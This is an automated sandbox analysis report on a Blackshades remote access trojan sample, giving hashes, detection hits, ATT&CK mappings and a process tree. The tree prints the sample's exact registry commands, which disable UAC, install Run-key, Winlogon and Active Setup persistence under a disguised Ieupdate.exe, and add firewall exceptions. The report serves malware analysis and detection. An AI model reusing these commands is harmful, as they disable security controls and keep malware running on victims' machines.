blackshades | 35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479

Analysis

max time kernel
119s
max time network
109s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
05-02-2025 00:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
Size

1.7MB
MD5

9c8faa08895326855039435ed6a33c30
SHA1

91b32df2d75a393f248debf1de8b787179332b1c
SHA256

35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479
SHA512

14c82044d7bc1945522dec468f12ff3a3de6137157b83b13d3d8cbd78575c579d7f5f7f9ef7c30b64f33f14c62eb786a3f00432760e7da4e536d0235d48323c4
SSDEEP

24576:69SQXgnU56Gt4ULYVI8RGwvrK7/ckFLI78c2:KsnxUh

Score

10^/10

blackshades defense_evasion discovery persistence rat trojan upx

Malware Config

Signatures

Blackshades
Blackshades is a remote access trojan with various capabilities.
rat blackshades
Blackshades family
blackshades

Blackshades payload 11 IoCs

resource	yara_rule
behavioral2/memory/4020-59-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-73-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-78-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-83-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-87-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-91-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-95-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-99-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-103-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-107-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades
behavioral2/memory/4020-111-0x0000000000400000-0x000000000045C000-memory.dmp	family_blackshades

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe, C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe"	reg.exe

Modifies firewall policy service 3 TTPs 10 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\AppData\Roaming\vb6.exe = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe:*:Enabled:Windows Messanger"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\Internet Explorer\Ieupdate.exe = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe:*:Enabled:Windows Messanger"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	Ieupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 4 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}	Ieupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe
Key created	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}	Ieupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe

Executes dropped EXE 3 IoCs

pid	Process
2000	Ieupdate.exe
4020	Ieupdate.exe
2612	Ieupdate.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe"	Ieupdate.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Ieupdate.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2000 set thread context of 4020	2000	Ieupdate.exe	101
PID 2000 set thread context of 2612	2000	Ieupdate.exe	102

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4020-57-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-59-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-55-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/2612-61-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/memory/2612-69-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/memory/2612-70-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/memory/4020-73-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/2612-77-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/memory/4020-78-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-83-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-87-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-91-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-95-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-99-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-103-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-107-0x0000000000400000-0x000000000045C000-memory.dmp	upx
behavioral2/memory/4020-111-0x0000000000400000-0x000000000045C000-memory.dmp	upx

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Internet Explorer\Ieupdate.txt	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
File created	C:\Program Files (x86)\Internet Explorer\Ieupdate.exe	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\Ieupdate.exe	Ieupdate.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\Ieupdate.exe	Ieupdate.exe
File created	C:\Program Files (x86)\Internet Explorer\Ieupdate.txt	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ieupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ieupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ieupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
1008	reg.exe
1984	reg.exe
2904	reg.exe
2408	reg.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: 1	4020	Ieupdate.exe
Token: SeCreateTokenPrivilege	4020	Ieupdate.exe
Token: SeAssignPrimaryTokenPrivilege	4020	Ieupdate.exe
Token: SeLockMemoryPrivilege	4020	Ieupdate.exe
Token: SeIncreaseQuotaPrivilege	4020	Ieupdate.exe
Token: SeMachineAccountPrivilege	4020	Ieupdate.exe
Token: SeTcbPrivilege	4020	Ieupdate.exe
Token: SeSecurityPrivilege	4020	Ieupdate.exe
Token: SeTakeOwnershipPrivilege	4020	Ieupdate.exe
Token: SeLoadDriverPrivilege	4020	Ieupdate.exe
Token: SeSystemProfilePrivilege	4020	Ieupdate.exe
Token: SeSystemtimePrivilege	4020	Ieupdate.exe
Token: SeProfSingleProcessPrivilege	4020	Ieupdate.exe
Token: SeIncBasePriorityPrivilege	4020	Ieupdate.exe
Token: SeCreatePagefilePrivilege	4020	Ieupdate.exe
Token: SeCreatePermanentPrivilege	4020	Ieupdate.exe
Token: SeBackupPrivilege	4020	Ieupdate.exe
Token: SeRestorePrivilege	4020	Ieupdate.exe
Token: SeShutdownPrivilege	4020	Ieupdate.exe
Token: SeDebugPrivilege	4020	Ieupdate.exe
Token: SeAuditPrivilege	4020	Ieupdate.exe
Token: SeSystemEnvironmentPrivilege	4020	Ieupdate.exe
Token: SeChangeNotifyPrivilege	4020	Ieupdate.exe
Token: SeRemoteShutdownPrivilege	4020	Ieupdate.exe
Token: SeUndockPrivilege	4020	Ieupdate.exe
Token: SeSyncAgentPrivilege	4020	Ieupdate.exe
Token: SeEnableDelegationPrivilege	4020	Ieupdate.exe
Token: SeManageVolumePrivilege	4020	Ieupdate.exe
Token: SeImpersonatePrivilege	4020	Ieupdate.exe
Token: SeCreateGlobalPrivilege	4020	Ieupdate.exe
Token: 31	4020	Ieupdate.exe
Token: 32	4020	Ieupdate.exe
Token: 33	4020	Ieupdate.exe
Token: 34	4020	Ieupdate.exe
Token: 35	4020	Ieupdate.exe
Token: SeDebugPrivilege	4020	Ieupdate.exe
Token: SeDebugPrivilege	2612	Ieupdate.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
2000	Ieupdate.exe
2000	Ieupdate.exe
4020	Ieupdate.exe
4020	Ieupdate.exe
4020	Ieupdate.exe
2612	Ieupdate.exe
2612	Ieupdate.exe
4020	Ieupdate.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3816 wrote to memory of 2052	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	86
PID 3816 wrote to memory of 2052	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	86
PID 3816 wrote to memory of 2052	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	86
PID 2052 wrote to memory of 1952	2052	cmd.exe	89
PID 2052 wrote to memory of 1952	2052	cmd.exe	89
PID 2052 wrote to memory of 1952	2052	cmd.exe	89
PID 2052 wrote to memory of 1600	2052	cmd.exe	90
PID 2052 wrote to memory of 1600	2052	cmd.exe	90
PID 2052 wrote to memory of 1600	2052	cmd.exe	90
PID 3816 wrote to memory of 1844	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	91
PID 3816 wrote to memory of 1844	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	91
PID 3816 wrote to memory of 1844	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	91
PID 1844 wrote to memory of 2308	1844	cmd.exe	93
PID 1844 wrote to memory of 2308	1844	cmd.exe	93
PID 1844 wrote to memory of 2308	1844	cmd.exe	93
PID 3816 wrote to memory of 2276	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	94
PID 3816 wrote to memory of 2276	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	94
PID 3816 wrote to memory of 2276	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	94
PID 2276 wrote to memory of 2304	2276	cmd.exe	96
PID 2276 wrote to memory of 2304	2276	cmd.exe	96
PID 2276 wrote to memory of 2304	2276	cmd.exe	96
PID 3816 wrote to memory of 4460	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	97
PID 3816 wrote to memory of 4460	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	97
PID 3816 wrote to memory of 4460	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	97
PID 4460 wrote to memory of 3312	4460	cmd.exe	99
PID 4460 wrote to memory of 3312	4460	cmd.exe	99
PID 4460 wrote to memory of 3312	4460	cmd.exe	99
PID 3816 wrote to memory of 2000	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	100
PID 3816 wrote to memory of 2000	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	100
PID 3816 wrote to memory of 2000	3816	35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe	100
PID 2000 wrote to memory of 4020	2000	Ieupdate.exe	101
PID 2000 wrote to memory of 4020	2000	Ieupdate.exe	101
PID 2000 wrote to memory of 4020	2000	Ieupdate.exe	101
PID 2000 wrote to memory of 4020	2000	Ieupdate.exe	101
PID 2000 wrote to memory of 4020	2000	Ieupdate.exe	101
PID 2000 wrote to memory of 4020	2000	Ieupdate.exe	101
PID 2000 wrote to memory of 4020	2000	Ieupdate.exe	101
PID 2000 wrote to memory of 4020	2000	Ieupdate.exe	101
PID 2000 wrote to memory of 2612	2000	Ieupdate.exe	102
PID 2000 wrote to memory of 2612	2000	Ieupdate.exe	102
PID 2000 wrote to memory of 2612	2000	Ieupdate.exe	102
PID 2000 wrote to memory of 2612	2000	Ieupdate.exe	102
PID 2000 wrote to memory of 2612	2000	Ieupdate.exe	102
PID 2000 wrote to memory of 2612	2000	Ieupdate.exe	102
PID 2000 wrote to memory of 2612	2000	Ieupdate.exe	102
PID 2000 wrote to memory of 2612	2000	Ieupdate.exe	102
PID 4020 wrote to memory of 1352	4020	Ieupdate.exe	103
PID 4020 wrote to memory of 1352	4020	Ieupdate.exe	103
PID 4020 wrote to memory of 1352	4020	Ieupdate.exe	103
PID 4020 wrote to memory of 4504	4020	Ieupdate.exe	104
PID 4020 wrote to memory of 4504	4020	Ieupdate.exe	104
PID 4020 wrote to memory of 4504	4020	Ieupdate.exe	104
PID 4020 wrote to memory of 3928	4020	Ieupdate.exe	105
PID 4020 wrote to memory of 3928	4020	Ieupdate.exe	105
PID 4020 wrote to memory of 3928	4020	Ieupdate.exe	105
PID 4020 wrote to memory of 4796	4020	Ieupdate.exe	106
PID 4020 wrote to memory of 4796	4020	Ieupdate.exe	106
PID 4020 wrote to memory of 4796	4020	Ieupdate.exe	106
PID 4504 wrote to memory of 1008	4504	cmd.exe	111
PID 4504 wrote to memory of 1008	4504	cmd.exe	111
PID 4504 wrote to memory of 1008	4504	cmd.exe	111
PID 1352 wrote to memory of 1984	1352	cmd.exe	112
PID 1352 wrote to memory of 1984	1352	cmd.exe	112
PID 1352 wrote to memory of 1984	1352	cmd.exe	112

C:\Users\Admin\AppData\Local\Temp\35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe
"C:\Users\Admin\AppData\Local\Temp\35acccccd5fbf615e4ee99c495a54f98b4f40bbef9d64ce210b18bea1101b479N.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JNYVYK.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center /v UACDisableNotify /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1952
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dVBuP.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1844
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DoNlH.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yKZES.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4460
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "Explorer.exe, C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f
    3⤵
    - Modifies WinLogon for persistence
    - System Location Discovery: System Language Discovery
    PID:3312
- C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
  "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
    "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"
    3⤵
    - Adds policy Run key to start application
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4020
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1352
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
        5⤵
        Modifies firewall policy service
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1984
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4504
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f
        5⤵
        Modifies firewall policy service
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1008
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3928
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
        5⤵
        Modifies firewall policy service
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2904
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4796
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f
        5⤵
        Modifies firewall policy service
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2408
- - C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
    "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Internet Explorer\Ieupdate.txt

Filesize
1.7MB

MD5
f568f00a8b8505fda88f448bc62bbd4d

SHA1
ee18386be26ce4d9144f546fd8d9a5ead5f3cde9

SHA256
762ee2755f9cc5febb4167603ce736075a1d554ad6d9b47f37d748d6f4dfbf8d

SHA512
cc8ab3365d159dcf60a542855a3086cf1dc754d16ddc9fad2b6f60df2b2328cdd6d5d6b1c04a38e39975206f2c2ec2310bf5e5a82398b26f2d9fb33317a6be77

Download Submit
C:\Users\Admin\AppData\Local\Temp\DoNlH.bat

Filesize
148B

MD5
